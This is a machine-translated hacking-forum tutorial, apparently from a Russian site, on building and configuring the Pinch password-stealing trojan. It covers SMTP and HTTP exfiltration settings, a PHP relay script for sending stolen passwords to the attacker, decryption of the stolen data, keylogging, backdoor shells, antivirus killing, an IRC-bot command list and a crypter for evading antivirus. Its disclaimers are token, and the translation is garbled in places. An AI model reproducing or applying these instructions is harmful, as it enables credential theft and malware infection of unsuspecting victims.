This page has been robot translated, sorry for typos if any. Original content here.

On casse du savon, on utilise BrutusAET2


LE MATERIEL EST MIS A DES FINS IMPORTANTES. L'AUTEUR N'EST RESPONSABLE D'AUCUNE RESPONSABILITÉ


-------------------------------------------------- ----------------
Partie 1. Vieux, mais utile. pour pincer 1

************************
Instructions Pinch 1.0
************************

=====
Intro
=====

S'il vous plaît ne soyez pas surpris que j'ai décidé d'écrire un article similaire (article pour lamerzzz). Le fait est que sur mon forum (http://forum.web-hack.ru) un sujet est créé environ tous les trois jours, par exemple "Comment configurer et utiliser correctement Pinch?", "Comment utiliser Pinch ʻem?" et ainsi de suite

===========
Des opportunités
===========

Ce cheval de Troie était très répandu en 2003/2004. Tout cela grâce à la possibilité de voler un grand nombre de mots de passe (ICQ99b-2003a / Lite / ICQ2003Pro, MI Miranda, Trillian ICQ & AIM, & RQ, The Bat! ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (prise en charge 9x / Me / 2k / xp)), faible poids, open source, et création facile de Troie pour une tâche spécifique. Troyan présente les caractéristiques suivantes:

- Envoyer la configuration de l'ordinateur de la victime: système d'exploitation, RAM, CPU, disque dur, utilisateur enregistré, nom d'hôte, IP
- Enregistreur de frappe (Key-log)
- Console distante (Console distante)
- contournement du pare-feu
- Envoi de tous les mots de passe à E-mail en utilisant le serveur SMTP
- Cryptage des mots de passe volés envoyés par mail
- Suppression automatique du cheval de Troie après le lancement
- Rapports HTML / texte
- La taille du fichier est d'environ 10 Ko
- Système modulaire
- Et bien plus encore ...

Trojan a écrit coban2k (http://www.cobans.net) - une personne assez connue dans le monde du piratage ICQ. En raison de problèmes d'hébergement liés à l'enregistrement du cheval de Troie sur leur serveur, l'auteur a été contraint de supprimer cette création de son site. Malheureusement, presque tous les antivirus le trouvent et ne peut être envoyé qu’à une victime qui n’a pas d’antivirus.

============
Ensemble complet
============

L'archive (pinch_1.0.zip) contenant le cheval de Troie comprend les dossiers et fichiers suivants:

\ PinchBuilder.exe - Assistant de Troie
\ Parser.exe - un programme pour décrypter les lettres cryptées avec des mots de passe
\ readme.txt - pas de commentaire
\ Pinch \ - dossier principal avec source et compilateur Trojan asm
\ Sources \ - autres sources
\ TB! 2 Plugin (Auto-parser) \ - un dossier avec un plugin pour The Bat 2!, Qui décode les e-mails cryptés avec des mots de passe entrants dans votre boîte de réception.
\ Sources \ Script \ - Script PHP, via lequel les mots de passe sont envoyés lors de la sélection de l'option appropriée lors de la compilation (lire ci-dessous)

=================
Compiler Troie
=================

Un assistant spécial (PinchBuilder.exe) est inclus. Il crée le cheval de Troie en fonction de vos besoins et le compile sur votre ordinateur. Le programme comporte deux onglets principaux: Compiler et Déchiffrer. Le premier sert à créer un cheval de Troie et le second à décrypter les mots de passe (en fait, cet onglet est le résultat du fichier Parser.exe). Viennent ensuite trois sous-onglets: SMTP, HTTP et FILE. Ils définissent l'option pour afficher les mots de passe. Laissez-nous examiner chacun plus en détail:

========
SMTP
========

Dans le champ Serveur, entrez l'adresse (nom d'hôte / ip) du serveur SMTP. Si vous avez entré le domaine du serveur, cliquez sur Résoudre pour que le domaine du serveur prenne la forme d'une adresse IP. Ensuite, dans les champs De et À, nous indiquons notre savon. Le bouton Envoyer massage de test sert à envoyer une lettre de test via les paramètres que vous avez définis. Je lui recommande fortement d'utiliser. Si la lettre n'arrive pas, cela signifie qu'il existe des problèmes d'envoi (pare-feu activé, SMTP faible, ne pas cliquer sur Résoudre, etc.).

Je tiens à noter que récemment, la plupart des fournisseurs basculent vers un système permettant à leurs clients d’envoyer des courriers électroniques UNIQUEMENT à partir de LEUR serveur SMTP. Dans de tels cas, je vous recommande d'utiliser la méthode d'envoi d'e-mails via HTTP.

====
HTTP
====

Téléchargez le fichier \ Sources \ Script \ view.php sur le serveur qui prend en charge les scripts PHP et exécute la fonction mail (). Plus loin dans le champ URL, nous indiquons le chemin d'accès à ce script (par exemple, http://www.xss.ru/pinch.php). Dans le champ Objet, indiquez le nom du sujet à partir duquel les lettres seront envoyées. Dans le champ Status check str, une chaîne doit être émise par le script après son chargement. Dans le script qui accompagne le troye, il importe: _ret_ok_1:

<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>

Si cette valeur n'est pas acceptée par le cheval de Troie, il essaiera d'envoyer un courrier électronique par le biais de ce script toutes les minutes jusqu'à ce qu'il reçoive une réponse dans le champ provenant du champ Status check str. Je vous recommande d'utiliser le script non pas de la livraison standard, mais écrit par moi:

<html> <body>
<? php
// Auteur: Terabyte (http://www.web-hack.ru)
$ email = $ _ POST ['a'];
$ subject = $ _ POST ['b'];
$ msg = $ _ POST ['c'];
if (isset ($ email) et isset ($ sujet) et isset ($ msg))) {
mail ($ email, $ sujet, $ msg, "De: $ email");}
?>
<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>
</ body> </ html>

Il fait presque la même chose, mais est écrit avec plus de compétence. L'utilisation de cette méthode d'envoi de mots de passe présente un énorme avantage: elle vous permet d'envoyer des mots de passe pour contourner le pare-feu. Comment cela est-il réalisé? Voici un extrait du journal de l'avant-poste lors de l'envoi d'un mot de passe via un script de mon site:

Nom du processus: iexplorer.exe
Protocole: HTTP
Adresse à distance: www.web-hack.ru

Je pense que tout le monde a compris qui ne fait pas partie du réservoir =). De plus, je peux souligner la possibilité d'écrire des courriels chiffrés sur votre site, plutôt que de les envoyer au savon; la possibilité de changer le soap auquel les mots de passe sont envoyés, au cas où il serait supprimé; pendant la distribution en masse de Troie (afin que les mots de passe puissent être envoyés même à partir de ces fournisseurs, où l'accès à tous les serveurs SMTP, à l'exception de ceux-ci, est désactivé)

====
DOSSIER
====

Cet onglet définit le chemin d'accès au fichier dans lequel tous les mots de passe sont enregistrés. Pour ce faire, vous devez écrire le chemin d'accès au fichier dans le champ Chemin d'accès (par exemple, C: \ password.txt).

=================
Options du compilateur
=================

Dans ce domaine, tout est clair, il vous suffit ensuite de cocher les champs où vous en avez besoin. Il convient de prêter attention au champ Ajouter une icône. Il indique le chemin d'accès à l'icône avec laquelle le cheval de Troie compilé sera affiché. Je tiens à noter que sur mon système (Windows XP), je ne pouvais pas compiler Troy avec cette option activée et que je devais être désactivé.

Dans les champs Protocole, indiquez la méthode d'envoi des mots de passe (SMTP / HTTP / FILE). Ensuite, cliquez sur le bouton Compiler et le cheval de Troie devrait compiler. Celui-ci sera enregistré dans le dossier principal avec l'assistant pour le créer.

====================
Décryptage du mot de passe
====================

Supposons que vous ayez réussi à pousser le lamer sur cette trompe et que les mots de passe de la voiture de la victime se trouvent sur le savon. Le fait est que lors de l’envoi de mots de passe, ceux-ci sont chiffrés et doivent être déchiffrés d’abord (à moins que vous n’ayez un plugin spécial pour TheBat! Décrit ci-dessus). Copiez le texte avec les mots de passe codés dans le presse-papiers, ouvrez Parser.exe (ou l'onglet Déchiffrer dans PinchBuilder.exe) et cliquez sur Traiter les données (ou appuyez simplement sur Alt + C) dans le menu contextuel. Ensuite, le programme vous donnera toutes les données volées à la victime avec un formulaire pratique. Ensuite, vous pouvez enregistrer ou imprimer.

==========
Conclusion
==========

Je tiens à vous avertir que si vous utilisez ce cheval de Troie, vous tombez immédiatement sous l’article 273 du Code pénal et vous pouvez être sévèrement puni ;-) Je (l’auteur de l’article) n’assume aucune responsabilité pour les torts que pourrait causer une personne après avoir lu mon article.


--------------------------------------------

partie 2. instruction de pincer 2.58

Un petit article sur les paramètres élémentaires pincer. Ne jugez pas strictement, mais critiquez de manière exhaustive. Article de configuration de pincement 2.58.

Je pense qu'il n'y a pas de problème avec le crack th, il n'y a pas d'aide détaillée et même une vidéo est jointe Je veux montrer comment accorder Bilder:

Propriétés SMTP
Serveur (entrez, dans votre cas, smtp.mail.ru), vous devez ensuite cliquer sur Résoudre pour le convertir en IP (au fait, toutes les fraudes doivent être effectuées lorsque Internet est connecté)

Port - laissez tel quel

Protocole - choix du mode de réception du rapport, via SMTP, HTTP (via php) et FILE - enregistré sur l'ordinateur. Des boutons avec le même nom (SMTP, HTTP, FILE), la configuration du protocole, mais dans ce cas, nous sommes intéressés par SMTP et nous l'avons déjà configuré.

Bouton TestSend envoyant un message de test à un e-mail.

Onglet PWD - empêche les mots de passe des programmes listés. L'élément ENABLE PWD lors de la suppression des rapports Daws ne contiendra pas de mots de passe.
Galka N'envoyez pas d'ancien rapport - n'envoyez pas d'anciens rapports.
Galki Encrypt et Packing sont interdépendants. FSG, UPX, MEW choix d’emballage.

Onglet RUN - sélectionnez les méthodes de démarrage. Je pense que vous allez comprendre. Déroulez comme .... standart, DLL, Undelate Service. Déplacer vers un dossier ..... ou vous spécifiez ou sélectionnez l’un de ceux-ci. Sur la droite, la colonne Valeurs que je n'ai pas touchée et imaginons vaguement pourquoi il l'est. En bas à droite - contourner le Pare-feu Windows (SP2) - pour contourner le pare-feu du système dans SP2 (pour autant que je sache le mécanisme de cet élément - il démarre en tant que iexplorer.exe)

L'onglet SPY - quelques rapports supplémentaires - cela n'a pas fonctionné pour moi. Screen Spy Fad - faire une capture d'écran, mais encore une fois cela ne fonctionnait pas pour moi (Skin a été envoyé, mais il était vide)

Onglet NET - je ne l'ai pas utilisé. Il est destiné à:
1. Ouvrez n’importe quel port de l’ordinateur infecté et accédez-y en conséquence (je vous déconseille vivement de l’utiliser, si vous ne le chiffrez pas, si vous êtes pris, vous pouvez deviner ce qui va se passer ...)
2. Downloader - Indication d'un lien direct vers n'importe quel fichier devant être téléchargé et exécuté (évaluez les dépenses que votre ennemi engagera s'il a du trafic ......)))))
3. Mise à jour automatique - mise à jour automatique - une fois les travaux terminés, télécharge sa copie, puis se supprime au prochain démarrage du système. Une nouvelle copie est lancée (pour plus de fiabilité, afin de ne pas la retrouver).

Onglet BD (porte dérobée) - la console ouvre un shell sur le port sélectionné, contrôlé via telnet (telnet.exe) ou d’autres programmes. (Je n'ai pas essayé moi-même)

L'onglet ECT - coller avec n'importe quel fichier, ainsi que l'installation de l'icône ... Vous pouvez aussi faire ça, le message apparaît ... Mais quelque chose ne fonctionne pas ...

Onglet KILL - destruction d’un processus (vous pouvez essayer de supprimer l’antivirus), par exemple, "spidernt" - et ensuite le moniteur DrWEB s’éteindra (je vous préviens, je ne l’ai pas encore fait, mais je vais essayer)

Onglet IE - installez votre page de démarrage sur votre navigateur. Ajouter une page aux favoris ....

WORM tab - sho tse prendre, je ne sais pas ... .....

Onglet IRC-bot - accès à l'ordinateur via IRC:
Autorisation .login
.die - arrêt du bot
.download - saut de fichier depuis l'URL
.httpd - ouvre un fichier via http sur un port spécifique
.killthread - achèvement d'une tâche spécifique
.proxy - ouverture de socks4 sur le port sélectionné avec l'id sélectionné
.raw - envoi de texte brut à ce serveur irc
.remove - suppression automatique
.restart - redémarrer
.run - commandes d'exécution
.scan - scanne les adresses IP vers des ports ouverts spécifiques
.shell - ouvrir un shell sur un port spécifique (pas 95/98 / ME)
.status - Afficher la version, IP, date de lancement
.threads - affiche les tâches actives
.update - bot à mise à jour automatique à partir d'une URL spéciale
.visit - visiter l'URL sélectionnée cachée
.url - visiter l'URL sélectionnée ouvertement
.link - ajouter aux favoris
.sp - faire la maison
.msg - message (boîte de message)

Cela semble être tout .... Vous appuyez sur COMPILE et un triple apparaît dans votre dossier avec le constructeur ...

BONNE CHANCE !!!!!

Post-scriptum Ceci est, comme, tout est écrit pour la revue et l'auteur n'est pas responsable des conséquences ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Caractéristiques de la crypte:
Cryptor polymorphe usagé
Contourner KIS et Outpost (y compris les dernières versions)
Auto-élimination
Taille réduite (le pincement normal est réduit de 3 à 6 Ko, le chargeur zupacha de 60 à 80 Ko)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~